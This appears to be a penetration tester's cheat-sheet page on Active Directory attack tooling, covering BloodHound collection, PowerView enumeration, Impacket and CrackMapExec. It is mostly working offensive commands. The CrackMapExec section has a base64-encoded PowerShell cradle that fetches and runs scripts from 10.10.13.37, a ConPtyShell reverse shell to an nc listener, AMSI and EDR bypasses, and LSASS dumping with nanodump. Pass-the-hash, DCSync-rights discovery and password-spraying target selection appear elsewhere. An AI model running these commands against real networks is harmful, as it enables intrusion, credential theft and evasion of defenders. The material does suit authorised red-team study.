AD Labs
Capsulecorp
Game Of Active Directory
Winning GOAD
Bank Security Challenge
The Path to DA
Tools
BloodHound
Setup
BloodHound BHCE
Quick start:
Copy curl -sSL https://api.github.com/repos/ly4k/BloodHound/releases/latest | jq -r '.assets[].browser_download_url' | grep 'BloodHound-linux-x64.zip' | wget -O 'BloodHound.zip' -i -
unzip BloodHound.zip && rm BloodHound.zip
mv BloodHound-linux-x64 BloodHound && cd BloodHound
sudo chown root:root chrome-sandbox
sudo chmod 4755 chrome-sandbox
chmod +x BloodHound
sudo mkdir /usr/share/neo4j/logs/
mkdir -p ~/.config/bloodhound
curl -sSL https://github.com/ThePorgs/Exegol-images/raw/main/sources/assets/bloodhound/customqueries.json > /tmp/customqueries1.json
curl -sSL https://github.com/CompassSecurity/BloodHoundQueries/raw/master/BloodHound_Custom_Queries/customqueries.json > /tmp/customqueries2.json
curl -sSL https://github.com/ZephrFish/Bloodhound-CustomQueries/raw/main/customqueries.json > /tmp/customqueries3.json
curl -sSL https://github.com/ly4k/Certipy/raw/main/customqueries.json > /tmp/customqueries4.json
curl -sSL https://github.com/emiliensocchi/azurehound-queries/raw/main/customqueries.json > /tmp/customqueries5.json
python3 - << 'EOT'
import json
from pathlib import Path
merged, dups = {'queries': []}, set()
for jf in sorted((Path('/tmp')).glob('customqueries*.json')):
with open(jf, 'r') as f:
for query in json.load(f)['queries']:
if 'queryList' in query.keys():
qt = tuple(q['query'] for q in query['queryList'])
if qt not in dups:
merged['queries'].append(query)
dups.add(qt)
with open(Path.home() / '.config' / 'bloodhound' / 'customqueries.json', 'w') as f:
json.dump(merged, f, indent=4)
EOT
rm /tmp/customqueries*.json
curl -sSL "https://github.com/ThePorgs/Exegol-images/raw/main/sources/assets/bloodhound/config.json" > ~/.config/bloodhound/config.json
sed -i 's/"password": "exegol4thewin"/"password": "WeaponizeK4li!"/g' ~/.config/bloodhound/config.json Quick start:
Copy curl -sSL https://ghst.ly/getbhce -o docker-compose.yml
sed -i 's|is the variable available outside of Docker|is the variable available outside of Docker\n - bhe_default_admin_principal_name=${bhe_default_admin_principal_name}\n - bhe_default_admin_password=${bhe_default_admin_password}\n - bhe_default_admin_email_address=${bhe_default_admin_email_address}|g' docker-compose.yml
curl -sSL https://github.com/SpecterOps/BloodHound/raw/refs/heads/main/examples/docker-compose/.env.example -o .env
sed -i 's|#NEO4J_DATA_MOUNT=./neo4j/data|NEO4J_DATA_MOUNT=./neo4j/data|g' .env
sed -i 's|#bhe_default_admin_principal_name=|bhe_default_admin_principal_name=admin|g' .env
sed -i 's|#bhe_default_admin_password=|bhe_default_admin_password=1|g' .env
sed -i 's|#bhe_default_admin_email_address=|bhe_default_admin_email_address=admin@bhce.local|g' .env
docker compose pull && docker compose up Import custom queries from legacy BloodHound:
Copy pipx install -f "git+https://github.com/exploide/bloodhound-cli.git"
bhcli auth 127.0.0.1:8080 -u admin -p 'Passw0rd!123'
bhcli queries ~/.config/bloodhound/customqueries.json BloodHound.py BHCE branch:
Copy pipx install -f "git+https://github.com/dirkjanm/BloodHound.py.git@bloodhound-ce" Reset ALL:
Copy docker compose down
docker volume rm ` docker volume ls -q | grep -e neo4j-data -e postgres-data ` Collectors
SharpHound.exe
Copy PS > .\SharpHound.exe [-d megacorp.local] [--LdapUsername snovvcrash] [--LdapPassword 'Passw0rd!'] -c All,GPOLocalGroup [--Stealth] --CollectAllProperties --OutputDirectory C:\Windows\Temp --MemCache --ZipFileName backup_full.zip [--RandomFilenames] [--Throttle 100] [--Jitter 20]
PS > .\SharpHound.exe -c SessionLoop --Loop --LoopInterval 00:01:00 --Loopduration 03:09:41 RustHound
SharpHound.ps1
Copy PS > Invoke-Bloodhound [-Domain megacorp.local] [-LdapUsername snovvcrash] [-LdapPassword 'Passw0rd!'] -CollectionMethod All,GPOLocalGroup [-Stealth] -CollectAllProperties -OutputDirectory C:\Windows\Temp -NoSaveCache -RandomizeFilenames -ZipFileName backup_full.zip [-Throttle 100] [-Jitter 20]
PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Loop -LoopInterval 00:01:00 -Loopduration 03:09:41 BloodHound.py
Copy $ cd ~/ws/enum/bloodhound/bloodhound.py/
$ bloodhound-python -c All,LoggedOn --zip -u snovvcrash -p 'Passw0rd!' -d megacorp.local -ns 192.168.1.11
$ proxychains4 -q bloodhound-python -c All,LoggedOn --zip -u snovvcrash --hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -d megacorp.local -ns 192.168.1.11 -dc DC01.megacorp.local -gc DC01.megacorp.local --dns-tcp Import with bloodhound-import :
Copy $ bloodhound-import -du neo4j -dp 'Passw0rd!' 20190115133114*.json ADExplorerSnapshot.py
BOFHound
Install:
Copy $ pipx install -f "git+https://github.com/coffeegist/bofhound.git"
$ pipx install -f "git+https://github.com/Tw1sm/pyldapsearch.git" An example of manual AD CS data collecting:
Copy $ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "DC=megacorp,DC=local" '(objectclass=domain)' -attributes '*,ntsecuritydescriptor' -silent
$ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=pKIEnrollmentService)' -attributes '*,ntsecuritydescriptor' -silent
$ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=certificationAuthority)' -attributes '*,ntsecuritydescriptor' -silent
$ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=pKICertificateTemplate)' -attributes '*,ntsecuritydescriptor' -silent
$ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=msPKI-Enterprise-Oid)' -attributes '*,ntsecuritydescriptor' -silent Resolve a SID:
Copy $ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps '(objectSid=S-1-5-21-2513662962-556311701-4231341873-512)' -attributes '*,ntsecuritydescriptor' Resolve group memebership:
Copy $ pyldapsearch -k -no-pass megacorp.local/snovvcrash@DC01.megacorp.local -no-smb -dc-ip DC01.megacorp.local -ldaps '(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=megacorp,DC=local)' -attributes '*,ntsecuritydescriptor' Parse:
Copy $ bofhound -i ~/.pyldapsearch/logs --parser ldapsearch --zip ADWS
Cypher (Neo4j)
Show percentage of collected user sessions:
Copy # http://localhost:7474/browser/
MATCH (u1:User)
WITH COUNT(u1) AS totalUsers
MATCH (c:Computer)-[r:HasSession]->(u2:User)
WITH totalUsers, COUNT(DISTINCT(u2)) AS usersWithSessions
RETURN totalUsers, usersWithSessions, 100 * usersWithSessions / totalUsers AS percetange Show path to any computer from kerberoastable users:
Copy MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p Manual JSON Parsing
There're 2 global dicts in JSON files: data and meta. We care about data:
Copy $ cat 19700101000000 _users.json | jq '. | keys'
[
"data" ,
"meta"
] List all active user accounts:
Copy $ cat 19700101000000_users.json | jq '.data[].Properties | select(.enabled == true) | .samaccountname' -r List non-empty user accounts' descriptions:
Copy $ cat 19700101000000_users.json | jq '.data[].Properties | select(.enabled == true and .description != null) | .name + " :: " + .description' -r List user accounts whose passwords were set after their last logon (an effective list for password spraying assuming that the passwords were set by IT Desk and may be guessable):
Copy $ cat 19700101000000_users.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset > .lastlogontimestamp) | .name + " :: " + (.lastlogontimestamp | tostring)' -r List user accounts with DoesNotRequirePreAuth set (aka asreproastable ):
Copy $ cat 19700101000000_users.json | jq '.data[].Properties | select(.enabled == true and .dontreqpreauth == true) | .name' -r List user accounts with SPN(s) set (aka kerberoastable )
Copy $ cat 19700101000000_users.json | jq '.data[].Properties | select(.enabled == true and .serviceprincipalnames != []) | .name + " :: " + (.serviceprincipalnames | join(","))' -r List computer accounts' operating system names:
Copy $ cat 19700101000000_computers.json | jq '.data[].Properties | .name + " :: " + .operatingsystem' -r Recursively list all members of a group (mimics RSAT Get-ADGroupMember, script ):
Copy $ ls
20220604043009_computers.json 20220604043009_groups.json 20220604043009_users.json
$ python3 get_ad_group_member.py 'DOMAIN ADMINS@MEGACORP.LOCAL' Recursively list all groups which the user is a member of (mimics RSAT Get-ADUser | select memberof, script ):
Copy $ ls
20220604043009_groups.json 20220604043009_users.json
$ python3 get_ad_user_memberof.py 'SNOVVCRASH@MEGACORP.LOCAL' Generate a .csv file containing AD trusts mapping to be used in TrustVisualizer (mimics PowerView Get-DomainTrustMapping, script ):
Copy $ ls
20220604043009_domains.json
$ python3 get_domain_trust_mapping.py PowerView / SharpView
Example Queries
Users
Convert SID to name and vice versa:
Copy PV3 > ConvertTo-SID <NAME>
PV3 > Convert-NameToSid <NAME>
PV3 > ConvertFrom-SID <SID>
PV3 > Convert-SidToName <SID> Extract all domain user accounts into a .csv file:
Copy PV3 > Get-DomainUser -Domain megacorp.local | select name,samAccountName,description,memberOf,whenCreated,pwdLastSet,lastLogonTimestamp,accountExpires,adminCount,userPrincipalName,servicePrincipalName,mail,userAccountControl | Export-Csv .\all-users.csv -NoTypeInformation List domain user accounts that do not require Kerberos pre-authentication (see ASREPRoasting ):
Copy PS > .\SharpView.exe Get-DomainUser -KerberosPreauthNotRequired -Properties samAccountName,userAccountControl,memberOf List domain user accounts with Service Principal Names (SPNs) set (see Kerberoasting ):
Copy PS > .\SharpView.exe Get-DomainUser -SPN -Properties samAccountName,memberOf,servicePrincipalName List domain user accounts with Kerberos unconstrained delegation enabled:
Copy PS > .\SharpView.exe Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" List domain user accounts with Kerberos constrained delegation enabled:
Copy PS > .\SharpView.exe Get-DomainUser -TrustedToAuth -Properties samAccountName,userAccountControl,memberOf Search for domain user accounts which may have sensitive stored in the description field:
Copy PV3 > Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null} Search for domain user by email:
Copy PV3 > Get-DomainUser -LDAPFilter '(mail=snovvcrash@megacorp.com)' -Properties samaccountname Find users with DCSync right:
Copy PV3 > $dcsync = Get-DomainObjectACL "DC=megacorp,DC=local" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ObjectAceType -match "Replication-Get"} | select -ExpandProperty SecurityIdentifier | select -ExpandProperty value
PV3 > Convert-SidToName $dcsync Groups
Enumerate domain computers where specific users (Identity) are members of a specific local group (LocalGroup):
Copy PV3 > Get-DomainGPOUserLocalGroupMapping -Identity snovvcrash -LocalGroup Administrators Computers
Extract all domain computer accounts into a .csv file:
Copy PV3 > Get-DomainComputer -Properties dnsHostName,operatingSystem,lastLogonTimestamp,userAccountControl | Export-Csv .\all-computers.csv -NoTypeInformation List domain computer accounts that allow Kerberos unconstrained delegation :
Copy PS > .\SharpView.exe Get-DomainComputer -Unconstrained -Properties dnsHostName,userAccountControl Resolve all domain computer IPs by their names:
Copy PV3 > Get-DomainComputer -Properties name | Resolve-IPAddress List domain computers that are part of a OU:
Copy PV3 > Get-DomainComputer | ? { $_.DistinguishedName -match "OU=<OU_NAME>" } | select dnsHostName Shares
List shares for WS01 computer:
Copy PS > .\SharpView.exe Get-NetShare -ComputerName WS01 GPOs
List all domain users with a 4-digit RID (eliminates default objects like 516, 519, etc.) who can edit GPOs:
Copy PV3 > Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "<SID>-[\d]{4,10}" } | select objectDN, activeDirectoryRights, securityIdentifier | fl Resolve GPO ObjectDN:
Copy PV3 > Get-DomainGPO -Name "<DN>" -Properties DisplayName Impacket
Install:
Copy $ pipx install -f "git+https://github.com/fortra/impacket.git"
$ pipx install -f "git+https://github.com/ThePorgs/impacket.git"
$ pipx install -f "git+https://github.com/p0dalirius/smbclient-ng" Static Binaries
Build Examples
Nuitka (Windows) staticx (Linux)
Copy Cmd > python.exe -V
Python 3.11.7
Cmd > python.exe -m pip install nuitka
Cmd > python.exe -m nuitka C:\Repos\impacket\examples\smbclient.py --onefile --onefile-tempdir-spec=C:\Users\user\AppData\Local\Temp\hello --follow-imports --output-filename=hello --jobs=16
Cmd > hello.exe --help
Copy $ git clone https://github.com/fortra/impacket /tmp/impacket && cd /tmp/impacket
$ docker run -it -v `pwd`:/app -w /app ubuntu:22.04
# apt update && apt install python3-dev python3-pip patchelf file
# pip install . pyinstaller staticx
# pyinstaller --specpath /tmp/spec --workpath /tmp/build --distpath /tmp/out --clean -F examples/smbclient.py
# staticx /tmp/out/smbclient examples/smbclient.py.elf
# file examples/smbclient.py.elf
examples/smbclient.py.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped {Crack,Sharp,Ps}MapExec / NetExec
Install bleeding-edge:
Copy $ sudo apt install python3-venv && pip3 install pipx
$ pipx install -f "git+https://github.com/Porchetta-Industries/CrackMapExec.git"
$ cme aardwolf requires Rust compiler to be also installed:
Copy $ sudo snap install rustup --classic
$ rustup toolchain install stable Install for debugging and development:
Copy $ git clone --recursive https://github.com/Porchetta-Industries/CrackMapExec ~/tools/CrackMapExec && cd ~/tools/CrackMapExec
$ poetry install
$ poetry run crackmapexec Execute a PowerShell command using base64 encoding on-the-fly:
Copy $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x "powershell -enc `echo -n 'iex(new-object net.webclient).downloadstring("http://10.10.13.37/amsi.ps1");iex(new-object net.webclient).downloadstring("http://10.10.13.37/cradle.ps1")' | iconv -t UTF-16LE | base64 -w0`" Bypass network IPS restrictions:
Copy $ sudo nmap -n -sn 192.168.1.0/24 | grep for | awk '{print $5}' > 192.168.1
$ for ip in `cat 192.168.1`; do cme smb $ip; sleep 1; done
Or
$ cme -t 1 --jitter 1 smb 192.168.1.0/24 Custom Switches
Bypass execution restrictions of EDRs monitoring for WmiPrvSE.exe misbehavior with custom switches (see dotnetassembly branch).
Get the dependencies and stuff:
Copy $ sudo apt install mono-devel
$ git clone --single-branch -b syscalls https://github.com/S4ntiagoP/donut ~/tools/donut && cd ~/tools/donut && make && sudo ln -sv `realpath donut` /usr/local/bin/donut && cd -
$ wget https://github.com/snovvcrash/CrackMapExec/raw/dotnetassembly/cme/data/donut_template.cs -O ~/.cme/donut_template.cs
$ wget https://github.com/snovvcrash/CrackMapExec/raw/dotnetassembly/cme/protocols/smb.py -O ~/.local/pipx/venvs/crackmapexec/lib/python3.10/site-packages/cme/protocols/smb.py Example of invoking a PowerShell module (ConPtyShell ):
Copy $ stty raw -echo; (stty size; cat) | nc -lvnp 1337
$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'Invoke-ConPtyShell.ps1 Invoke-ConPtyShell 10.10.13.37 1337' --amsi-bypass amsi.ps1 --no-output Example of executing a .NET assembly (Rubeus ):
Copy $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'Seatbelt.exe -group=user' --dotnetassembly --dotnetassembly-entrypoint 'Rubeus,Program,MainString' --dotnetassembly-entrypoint-argtype string --amsi-bypass amsi.ps1 --codec cp866 Example of converting an unmanaged binary (NanoDump ) to a shellcode with donut , then compiling a .NET self-injector from a template with the shellcode inside and executing it (see SharpBin2SelfInject ):
Copy $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'nanodump.exe -w C:\Windows\Temp\lsass.bin' --dotnetassembly --donut Slinky Cat & OffensiveSysAdmin
Mitigations
Common vulnerabilities & misconfigurations and recommendations:
SMB lateral-movement hardening:
Antispam protection for Exchange:
Detect stale, unused or fake computer accounts based on password age (replace -90 with your domain's maximum computer account password age):
Copy $date = [DateTime]::Today.AddDays(-90); Get-ADComputer -Filter '(Enabled -eq $true) -and (PasswordLastSet -le $date)' | select Name Administrative Tier Model & Microsoft RaMP (Zero Trust Ra pid M odernization P lan):
Post compromise AD actions (checklist):
Hardening automatization tool:
